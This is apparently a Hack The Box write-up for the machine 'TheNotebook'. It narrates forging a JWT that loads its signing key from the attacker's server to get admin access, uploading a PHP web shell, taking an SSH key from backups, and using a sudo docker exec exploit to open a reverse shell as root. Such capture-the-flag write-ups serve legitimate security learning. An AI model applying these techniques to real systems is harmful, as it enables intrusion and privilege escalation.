🔎🦶Enumeration/Foothold
TheNotebook is an Medium box from HTB and created by mostwanted002. This box features a CSRF exploit via JWT and a docker exploit. I begin each box by running a RustScan. This is bundled into my setup.sh script which I’ve mentioned in a few of my other posts. RustScan with NMAP
filters shows a website with registration available on Port 80
.
NMAP scan shows registration page available.
I register for the site to gain access:
Easy Sign Up registration.
After checking for a CSRF
(Cross-site request forgery) token and running a Dirbuster I notice an auth cookie present. I go to JWT.io and decode the cookie. I can see that a private key is being loaded.
JWT showing the private key pointing to localhost 7070.
I used ssh-keygen
to create a key and added it into the JWT request.
Creating a key with ssh-keygen.
I changed the JWT request to include my Public and Private keys. I then updated the URL to hit my local python3 webserver
and change the admin_cap
to 1
.
After creating the custom request I paste it into Cookie Editor and save the cookie:
Using the Cookie Editor Mozilla Plugin to save my new auth token.
Refreshing the page after gives me the Admin menu entry –
Receiving the privKey.key via newly created auth token.
I navigate to the Admin Panel and upload a PHP
based web-shell –
WSO PHP based webshell in action.
🔝Escalation
I use the Network tab to give me a low privilege shell and log into the box. I upgrade my shell and download LinPEAS to the box:
LinPEAS and general enumeration show me some folders in the var/backups
directory. I use the web-shell to download the files to my local machine.
Noticing a home file zipped – home.tar.gz
Going through the home.tar.gz
file shows me noahs home directory and his SSH
key. I save it to my working directory and log into the box.
Once I log into the box I check to see what sudo
commands can be run without a password –
sudo -l
shows I can run elevated commands on docker.
Googling ‘docker exec exploit’ gives me the following –
I alter the payload
line to create a reverse shell. I then build the file and start a web server:
⚠ Attack Machine (Tab 1)
Running the Docker exploit.
I launch a secondary SSH
session for the noah user and a reverse shell on my forth tab to Port 1234
and do the following:
⚠ Attack Machine (Tab 2)
🎯Victim Machine (Tab 1)
🎯Victim Machine (Tab 2)
The session will die shortly after (1min or so). You can switch the payload
line to add your SSH
key or just pull the flag directly for an easier time.
Rooted TheNotebook by HTB.